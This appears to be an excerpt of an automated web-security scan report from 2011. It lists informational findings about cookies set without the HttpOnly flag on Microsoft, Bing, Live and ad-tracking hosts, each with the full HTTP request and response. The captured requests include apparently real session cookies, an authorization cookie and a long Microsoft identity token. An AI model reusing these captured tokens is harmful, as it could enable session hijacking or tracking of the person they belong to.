...IHDR.....................sBIT....|.d....    pHYs...........~.....tEXtSoftware.Adobe Fireworks CS4........tEXtCreation Time.01/13/10.d[....4IDAT8.c......    .....O..H.....D..Q...G5.j..8.5..]@.F.
...[SNIP]...
15.130. http://blogs.technet.com/themes/technet/images/technet/widget-right.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /themes/technet/images/technet/widget-right.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/technet/images/technet/widget-right.png HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT; omniID=1301103997741_d54d_515d_2778_de1e1091d8c5; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 20:43:57 GMT
Accept-Ranges: bytes
ETag: "74b413eb62becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a20%3a53+GMT; expires=Sun, 25-Mar-2012 01:20:53 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:58 GMT
Content-Length: 2981

.PNG
.
...IHDR.............N.X....    pHYs...........~...
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
15.131. http://blogs.technet.com/utility/jquery/autoresize.jquery.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /utility/jquery/autoresize.jquery.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utility/jquery/autoresize.jquery.min.js HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 20:42:54 GMT
Accept-Ranges: bytes
ETag: "09b83c562becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a32%3a05+GMT; expires=Sun, 25-Mar-2012 01:32:05 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:45 GMT
Content-Length: 1182

/*
* jQuery autoResize (textarea auto-resizer)
* @copyright James Padolsey http://james.padolsey.com
* @version 1.04
*/

(function(a){a.fn.autoResize=function(j){var b=a.extend({onResize:functio
...[SNIP]...
15.132. http://blogs.technet.com/utility/jquery/jquery-1.3.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /utility/jquery/jquery-1.3.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utility/jquery/jquery-1.3.2.min.js HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 20:42:54 GMT
Accept-Ranges: bytes
ETag: "09b83c562becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a32%3a05+GMT; expires=Sun, 25-Mar-2012 01:32:05 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:45 GMT
Content-Length: 57254

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
15.133. http://blogs.technet.com/utility/js/omni_rsid_technet_current.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /utility/js/omni_rsid_technet_current.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utility/js/omni_rsid_technet_current.js HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 20:42:15 GMT
Accept-Ranges: bytes
ETag: "80ad44ae62becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Mon%2c+13+Dec+2010+00%3a46%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a31+GMT; expires=Sun, 25-Mar-2012 01:34:31 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:48 GMT
Content-Length: 73916

// for sites using analytics.aspx, update omniGuidPath with the path to the analytics.aspx file, omitting the protocol
// for blogs this should be either
//        omniGuidPath : "://blogs.msdn.com/anal
...[SNIP]...
15.134. http://c.bing.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Host: c.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/maps/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; _FP=; _HOP=; _SS=SID=0B4014F62A18466497C10109D4CCD2AB; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; OrigMUID=FA3AE6176FAC4414AD6FC26C726B4B15%2cf8d61f728c6f438090026fdef4b23378; SRCHD=MS=1699255&SM=1&D=1644428&AF=NOFORM

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.redcated/c.gif?DI=15074&RedC=c.bing.com&MXFR=FA3AE6176FAC4414AD6FC26C726B4B15
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=FA3AE6176FAC4414AD6FC26C726B4B15&TUID=1; domain=.bing.com; expires=Wed, 12-Oct-2011 00:55:17 GMT; path=/;
Date: Sat, 26 Mar 2011 00:55:17 GMT
Content-Length: 0

15.135. http://c.microsoft.com/trans_pixel.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.microsoft.com
Path:   /trans_pixel.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.asp?source=technet&TYPE=PV&uri=%2fen-us%2fmagazine(d%3ddefault)%2fgg537292(l%3den-us%2cv%3dMSDN.10).aspx&p=_en-us_magazine(d=default)_gg537292(l=en-us,v=MSDN.10).aspx HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg537292.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; ASP.NET_SessionId=ibbdu345amsbmpibe0301ljz; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi\00018@E0H02h8@E0H; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092921512:ss=1301092848759; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MS0=2a3c4c9fe97247d48c9a5163057b9a69; domain=.microsoft.com; expires=Sat, 26-Mar-2011 02:11:20 GMT; path=/
Set-Cookie: A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001:@E0I02h:@E0I; domain=.microsoft.com; expires=Tue, 26-Mar-2041 01:41:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:41:20 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.
15.136. http://d.101m3.com/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afr.php?zoneid=7&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://technet.microsoft.com/en-us/magazine/gg703766.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:40:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d; expires=Sun, 25-Mar-2012 01:40:27 GMT; path=/
Content-Length: 1873
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
15.137. http://d.101m3.com/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.101m3.com
Path:   /lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lg.php?bannerid=285&campaignid=191&zoneid=7&loc=http%3A%2F%2Ftechnet.microsoft.com%2Fen-us%2Fmagazine%2Fgg703766.aspx&cb=6a5643329a&r_id=5c8af6222d3765c9476cf9a663fc53e0&r_ts=lin5zf HTTP/1.1
Host: d.101m3.com
Proxy-Connection: keep-alive
Referer: http://d.101m3.com/afr.php?zoneid=7&cb=INSERT_RANDOM_NUMBER_HERE
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:40:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a5977eecb4adfd9822aa64b6f060709d; expires=Sun, 25-Mar-2012 01:40:27 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
15.138. http://dominionenterprises.112.2o7.net/b/ss/desoundings/1/H.22.1/s0369559922255  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dominionenterprises.112.2o7.net
Path:   /b/ss/desoundings/1/H.22.1/s0369559922255

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/desoundings/1/H.22.1/s0369559922255?AQB=1&ndh=1&t=25%2F2%2F2011%2014%3A14%3A13%205%20300&ce=UTF-8&ns=dominionenterprises&pageName=Archives%20and%20Archived%20Stories%20from%20Past%20Issues%20of%20Soundings%20Magazine&g=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F'%2BNSFTW%2B'%3Fordering%3D%26searchphrase%3Dall&cc=USD&ch=www.soundingsonline.com&events=event1%2Cevent2&c1=D%3Dg&v1=D%3Dg&c2=1&v2=1&c3=3%3A00PM&v3=3%3A00PM&c4=New&v4=New&c5=First%20Visit&v5=First%20Visit&c6=Friday&v6=Friday&c7=Weekday&v7=Weekday&c8=D%3Dvid&v8=D%3Dvid&c9=D%3DUser-Agent&v9=D%3DUser-Agent&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1426&bh=995&AQE=1 HTTP/1.1
Host: dominionenterprises.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/archives/'+NSFTW+'?ordering=&searchphrase=all
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_hddx60mexxx7Fdyn=[CS]v4|26B089AF05161C88-6000018280340219|4D61135D[CE]; s_vi_x7Dmx7Cgx7Ex7Ex7Dhaajmac=[CS]v4|26B08A8405161367-60000182C010AD84|4D611507[CE]; s_vi_x7Fox7Eex7Cx7Cx7Fjcchx3E=[CS]v4|26B08A9B05012A5C-600001058002D0CE|4D611534[CE]; s_vi_fvgx7Ceefvzzx7Ex7Cx7Brvx7Dtx7Bx7Bpy=[CS]v4|26B08B0B0515A83A-60000170E002473D|4D611615[CE]; s_vi_brcxxaabwx7Ex7Eux7Ftex7Ftf=[CS]v4|26B0882E85013EE2-4000011300003B32|4D6133AD[CE]; s_vi_brcxxaabwx7Ex7Euvx7Dx7Espx7D=[CS]v4|26B0882E85013EE2-4000011300003B36|4D6133AD[CE]; s_vi_djbjfni=[CS]v4|26B1E6568516110F-600001A22005DD5C|4D63CCAC[CE]; s_vi_px7Dx7Epx7Dx7Epx7Dx7Ex7Dx7Cozjvvwupwx7Cx2Bx29x28x29=[CS]v4|26B5D066050116F7-4000010C00002CBB|4D6BA0CB[CE]; s_vi_qsbuwx7Fx7Bx7Cx7Bqx7Dx7Fux7Ex7Dpsx7E=[CS]v4|26B5F02705011A74-6000010E6043A45F|4D6BE04C[CE]; s_vi_omx7Ckiaebeoca=[CS]v4|26B5F02705011A74-6000010E6043A461|4D6BE04C[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26B9D0678515890C-60000171A02DCBAE|4D739CD1[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26B9D06E8515B179-60000176C01BF3F8|4D739CD1[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26B9D07605158B72-4000017460083EC0|4D739CD1[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26B4C61605010DDC-4000010DA0030A5A|4D739CD1[CE]; s_vi_x7Ecprx7Dtxxx7Fetcprexxgt=[CS]v4|26B9D08D0515B42B-40000170E02E3A2E|4D739CD1[CE]; s_vi_ax7Combkckzobgx60e=[CS]v4|26B9D09D05010FBB-60000107202074F9|4D73A139[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26B4C51405012F9D-6000010720241BA0|4D73A139[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26B4C51405012F9D-6000010720241BA3|4D73A139[CE]; s_vi_x60ozikafackx7Eoik=[CS]v4|26BCAD6B05161FAA-40000182C009BFF6|4D795AD4[CE]; s_vi_ghx7Dnlfx7Cnj=[CS]v4|26BCC3520516355B-40000178801C7B4D|4D7986A3[CE]; s_vi_bmxxkickx60cnmx60=[CS]v4|26BCAD6B05161FAA-40000182C009BFF8|4D7986A3[CE]; s_vi_pogthb=[CS]v4|26BDBCFD85161ABA-4000018420047463|4D7B79FA[CE]; s_vi_x7Fx60hgx60jbcx7B=[CS]v4|26BDBCEC85013187-60000105A00E1118|4D7B80FF[CE]; s_vi_x7Bx7Bmxxodocayx7Fm=[CS]v4|26BE5F0A05012AAD-60000105A02058BD|4D7CBE13[CE]; s_vi_tfickhs=[CS]v4|26C083AB85161C76-600001A10000EC06|4D810756[CE]; s_vi_sx7Fx7Dx60edubgx7Fbx7Ctsx7Fx7D=[CS]v4|26C0B25C85162AD9-60000182E0076929|4D8164B8[CE]; s_vi_cjyhdexxx7Efny=[CS]v4|26C050B605011E14-600001088001EFAB|4D84B3A8[CE]; s_vi_elx7Fx7Flex7Ejabola=[CS]v4|26C050B605011E14-600001088001EFAD|4D84B3A8[CE]; s_vi_zemx7Fdcogx7Bmzi=[CS]v4|26C2FA24050124B4-60000106000036A0|4D85F447[CE]; s_vi_qmx60x28k=[CS]v4|26C304C68514AE44-6000018BC00031AE|4D86098B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26C3CB428501397C-40000101E06283DF|4D879683[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26C3CB428501397C-40000101E06283E1|4D879683[CE]; s_vi_fcnx7Focyxxx3E8hi=[CS]v4|26C59E2F051D080B-6000010BE01C673B|4D8B3C5D[CE]; s_vi_x7Ecgozoezfo=[CS]v4|26C5C04A851D046F-6000012FE0001030|4D8B8093[CE]; s_vi_x7Eyx7Fhhylix7Elahx7E=[CS]v4|26C5C56885011EAB-4000010A200F49A8|4D8B9DD7[CE]

Response

HTTP/1.1 302 Found
Date: Fri, 25 Mar 2011 19:13:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26C674AA85010E18-4000010D8000F523[CE]; Expires=Wed, 23 Mar 2016 19:13:25 GMT; Domain=dominionenterprises.112.2o7.net; Path=/
Location: http://dominionenterprises.112.2o7.net/b/ss/desoundings/1/H.22.1/s0369559922255?AQB=1&pccr=true&vidn=26C674AA85010E18-4000010D8000F523&&ndh=1&t=25%2F2%2F2011%2014%3A14%3A13%205%20300&ce=UTF-8&ns=dominionenterprises&pageName=Archives%20and%20Archived%20Stories%20from%20Past%20Issues%20of%20Soundings%20Magazine&g=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F'%2BNSFTW%2B'%3Fordering%3D%26searchphrase%3Dall&cc=USD&ch=www.soundingsonline.com&events=event1%2Cevent2&c1=D%3Dg&v1=D%3Dg&c2=1&v2=1&c3=3%3A00PM&v3=3%3A00PM&c4=New&v4=New&c5=First%20Visit&v5=First%20Visit&c6=Friday&v6=Friday&c7=Weekday&v7=Weekday&c8=D%3Dvid&v8=D%3Dvid&c9=D%3DUser-Agent&v9=D%3DUser-Agent&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1426&bh=995&AQE=1
X-C: ms-4.4
Expires: Thu, 24 Mar 2011 19:13:25 GMT
Last-Modified: Sat, 26 Mar 2011 19:13:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www108
Content-Length: 0
Content-Type: text/plain

15.139. http://explore.live.com/Handlers/Plt.mvc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://explore.live.com
Path:   /Handlers/Plt.mvc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Handlers/Plt.mvc?bicild=&v=15.40.1075 HTTP/1.1
Host: explore.live.com
Proxy-Connection: keep-alive
Referer: http://explore.live.com/microsoft-service-agreement?ref=none&mkt=en-us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MWTMsgr=1; wlidperf=latency=230&throughput=13; mkt=ep=en-US; xid=e974f2b7-a965-4936-8c0d-b729d0ddd997&&SN1xxxxxxxxLP10&122; xidseq=1; mktstate=S=1623281324&U=&E=en-us&B=en-us&P=; mkt1=norm=en-us; mkt2=marketing=en-us; wlexpid=e974f2b7-a965-4936-8c0d-b729d0ddd997; wlv=A|_-d:s*bbcTBg.2+1+0+3; E=P:cKFJ42e5zYg=:DvIDzcNKJyaRN000PJp8Q9uOCAm9eJ/dmlp5TXvwQLc=:F; wla42=; cookiesEnabled=true; BP=VID=0.8133&VC=0&RC=1&LTT=1301101088993&l=WSC.Explore&FR=&ST=; LD=e974f2b7-a965-4936-8c0d-b729d0ddd997_00167faf836_15501_1301101086023=L2967; MUID=FA3AE6176FAC4414AD6FC26C726B4B15

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=31536000
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 25 Mar 2012 00:59:35 GMT
Vary: Accept-Language,Cookie,Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: xidseq=3; domain=.live.com; path=/
Set-Cookie: E=P:OjGZNWi5zYg=:T1n4/jUtxt0z4GHJPQeq34PJVxDRlc0Y6nYWymmNMNM=:F; domain=.live.com; path=/
Set-Cookie: pltmode=1; domain=.live.com; expires=Sat, 26-Mar-2011 00:59:45 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sat, 02-Apr-2011 00:59:35 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sat, 02-Apr-2011 00:59:35 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 00:59:35 GMT

GIF89a.............!.......,...........2.;
15.140. https://feedback.discoverbing.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://feedback.discoverbing.com
Path:   /default.aspx

Issue detail

